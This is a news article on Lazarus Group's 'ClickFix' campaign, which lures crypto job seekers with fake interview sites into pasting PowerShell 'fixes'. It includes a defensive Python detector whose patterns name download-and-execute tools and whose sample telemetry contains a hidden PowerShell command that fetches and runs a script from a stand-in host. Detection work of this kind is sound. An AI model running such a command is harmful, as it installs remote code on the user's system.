
Lazarus Group Evolves Tactics to Target CeFi Job Seekers with ‘ClickFix’ Malware


Lazarus Group Escalates Cyber Attacks with New “ClickFix” Scheme Targeting Crypto Sector Job Seekers

A recent cybersecurity report from Sekoia has uncovered the latest developments in the ongoing cyber threats posed by the infamous Lazarus Group, a hacking collective with strong ties to North Korea. The report reveals that the group has evolved its tactics, now deploying a new strategy known as “ClickFix” to target job seekers in the cryptocurrency sector, particularly those working in centralized finance (CeFi) companies.

This new approach is an extension of the group's earlier campaign, “Contagious Interview,” which had initially focused on recruiting developers and engineers in the fields of artificial intelligence and cryptocurrency. With its latest maneuver, Lazarus appears to be diversifying its target pool, expanding its efforts beyond highly technical professionals to include a broader range of workers in the crypto industry.

Shifting Focus to Non-Technical Professionals

In this fresh wave of cyber attacks, Lazarus has shifted its attention to non-technical professionals, such as individuals in marketing, business development, and other roles that might not involve direct access to the backend code or infrastructure of a company. The attackers impersonate well-known and reputable cryptocurrency firms such as Coinbase, KuCoin, Kraken, and Tether, creating fake job application portals that closely resemble the legitimate sites of these organizations.

The attackers craft highly convincing job offers, luring unsuspecting victims with fake interview invitations. These fraudulent websites often include realistic job application forms and even requests for video introductions, which make the process seem entirely legitimate. The perpetrators go a step further by designing websites with highly convincing errors and prompts that are tailored to induce action from their targets.

The ClickFix Tactic: A Dangerous Deception

The deceptive nature of the “ClickFix” scheme becomes apparent when victims attempt to complete the video introduction process. Once a user begins recording their video, they are met with a fabricated error message, often indicating a malfunction in their webcam or video drivers. The page then encourages the user to run PowerShell commands to troubleshoot the problem; running those commands installs malware on the user’s system without the user realizing it.

This technique has proven to be particularly effective due to its psychological simplicity. Users, believing they are merely resolving a minor technical issue, unknowingly execute malicious code that compromises their system. The psychological manipulation involved plays a crucial role in the success of the attack, as victims tend to trust the prompt, thinking they are fixing a legitimate issue rather than executing malware.
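For defenders, the self-infection step described above is visible in process-creation telemetry. The following is an added example, not code from the article or from Sekoia's report: it flags PowerShell started from a user's desktop session with download-and-execute or concealment switches. The event field names, the parent-process list and the sample events are assumptions made for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Assumed heuristics for illustration; not indicators from the Sekoia report.
SHELLS = {"powershell.exe", "pwsh.exe"}
USER_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
SIGNALS = {
    "remote_fetch": re.compile(
        r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
        r"downloadstring|downloadfile)\b", re.I),
    "dynamic_exec": re.compile(r"\b(invoke-expression|iex)\b", re.I),
    "hidden_window": re.compile(
        r"(?<!\S)-w(in(dowstyle)?)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(
        r"(?<!\S)-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
}

def clickfix_signals(event):
    """Names of the signals that fire for one process-creation event."""
    if basename(event["image"]).lower() not in SHELLS:
        return []
    if basename(event["parent_image"]).lower() not in USER_PARENTS:
        return []  # not started from the user's own desktop session
    cmd = event["command_line"]
    return [name for name, rx in SIGNALS.items() if rx.search(cmd)]

def is_suspicious(event):
    hits = set(clickfix_signals(event))
    # Download plus in-memory execution, or any concealment switch.
    return ({"remote_fetch", "dynamic_exec"} <= hits
            or bool(hits & {"hidden_window", "encoded_command"}))

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed telemetry, not taken from any real incident
    {"host": "ws-01", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iex (iwr https://example.invalid/fix.ps1)"'},
    {"host": "ws-02", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Users"'},
    {"host": "srv-03", "image": PS, "parent_image": r"C:\Program Files\Agent\agent.exe",
     "command_line": 'powershell -c "iwr https://example.invalid/update.ps1 | iex"'},
]

def flagged_hosts(events=SAMPLE_EVENTS):
    return [e["host"] for e in events if is_suspicious(e)]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["host"], is_suspicious(e), clickfix_signals(e))
```

The parent-process gate is what separates a command a person typed or pasted from one issued by management tooling, which is why the third sample event is not flagged even though its command line resembles the first.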

According to Sekoia, the Lazarus Group has referenced over 184 fake interview invitations, impersonating at least 14 well-known companies in the cryptocurrency space, thus adding an element of credibility to its schemes. This extensive use of fake job applications and reputable company names further amplifies the threat, making it all the more difficult for job seekers to tell the fraudulent websites from the real ones.

Expanding Target Criteria: Beyond Developers to Business Roles

What is particularly noteworthy about this latest tactic is the shift in Lazarus's targeting strategy. Initially, the group focused primarily on developers and engineers, those with direct access to the technical infrastructure of cryptocurrency firms. However, with the new “ClickFix” campaign, the hackers are expanding their targets to include non-technical personnel, such as marketing professionals and business developers.

This shift suggests that the Lazarus Group is becoming more sophisticated in its approach to social engineering. While many of these non-technical professionals may not have access to code or infrastructure directly, they may still be privy to sensitive internal data or possess the ability to inadvertently facilitate a breach. In other words, the group's expanding target criteria underscores its intent to exploit the professional aspirations of those working in the crypto sector, even if they are not directly involved in the technical operations of the company.

Sekoia’s report also notes that while the “ClickFix” scheme is a new and growing threat, the original “Contagious Interview” campaign remains active. This suggests that Lazarus may be testing the effectiveness of different tactics or tailoring their approach to suit different demographics. In either case, the group's consistent goal remains the same: to deploy info-stealing malware through trusted channels and manipulate victims into self-infection.

Lazarus Group’s Involvement in Major Crypto Hacks

The Lazarus Group’s notorious activities are not limited to phishing schemes and fake job offers. The group has also been linked to several high-profile cyberattacks targeting major cryptocurrency exchanges. Most notably, the Federal Bureau of Investigation (FBI) has officially attributed a $1.5 billion cyberattack on the crypto exchange Bybit to Lazarus.

In this attack, the group used fake job offers to trick Bybit staff into installing compromised trading software known as “TraderTraitor.” This malware was designed to steal private keys and execute illicit transactions on the blockchain, thereby giving the hackers direct access to the exchange's assets. The TraderTraitor malware was built using cross-platform JavaScript and Node.js technologies, making it appear as though the application was legitimate.

Bybit’s attack is just one example of the Lazarus Group’s increasing involvement in targeting the cryptocurrency sector. The group’s persistence and ability to evolve its tactics have made it one of the most formidable threats in the cybersecurity landscape.

The Ongoing Threat of Lazarus Group

As Lazarus continues to refine its methods and expand its targets, the cryptocurrency sector remains on high alert. The recent shift to non-technical professionals highlights a new phase in the group's ongoing evolution, as they continue to adapt their strategies to exploit every possible vulnerability. Their ability to create seemingly legitimate job offers and disguise malicious activity as technical troubleshooting is a testament to their growing sophistication.

For individuals working in the cryptocurrency industry, especially those applying for jobs within this high-risk sector, it is crucial to remain vigilant. Recognizing the signs of a phishing attempt and exercising caution when engaging with unsolicited job offers can help prevent falling victim to these increasingly sophisticated attacks.

The cryptocurrency industry, with its fast-paced growth and lucrative opportunities, continues to be an attractive target for cybercriminals like Lazarus. As the group refines its tactics, it is essential for companies and job seekers alike to stay informed about the evolving threats in order to protect their assets and personal information.

Conclusion: Evolving Threats in the Crypto Space

The Lazarus Group’s activities underscore the constant and evolving threat landscape within the cryptocurrency sector. As cybercriminals adapt and refine their techniques, the need for heightened cybersecurity awareness is more crucial than ever. Whether through fake job offers, phishing scams, or direct attacks on cryptocurrency exchanges, the risk of falling victim to these sophisticated cybercrimes is ever-present.

For those working in the cryptocurrency industry, staying ahead of these threats requires ongoing education, vigilance, and a proactive approach to security. The growing sophistication of the Lazarus Group and similar hacking collectives serves as a reminder that the battle for digital security is ongoing, and only those who are well-prepared will be able to protect themselves from the next wave of cyber threats.

Source: cryptopotato
